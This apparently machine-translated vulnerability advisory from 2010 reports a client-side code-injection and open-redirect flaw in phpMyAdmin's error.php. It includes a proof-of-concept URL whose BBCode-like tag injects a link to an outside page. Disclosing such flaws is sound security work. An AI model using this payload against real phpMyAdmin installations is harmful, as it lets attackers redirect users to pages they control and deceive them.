PhpMyAdmin client side 0Day redirect link code injection-vulnerability warning-the black bar safety net

2010-12-22T00:00:00
ID MYHACK58:62201028641
Type myhack58
Reporter 佚名
Modified 2010-12-22T00:00:00

Description

PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:

Emanuele "emgent" Historical <emgent@backtrack-linux.org >

Marco "white_sheep" Rondini <white_sheep@backtrack-linux.org >

Alessandro "scox" Scoscia <scox@backtrack.it >

In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.

With the tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.

POC:

[http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www. sitedirsec. com%40_self]This%20Is%20a%20Link%2Fa]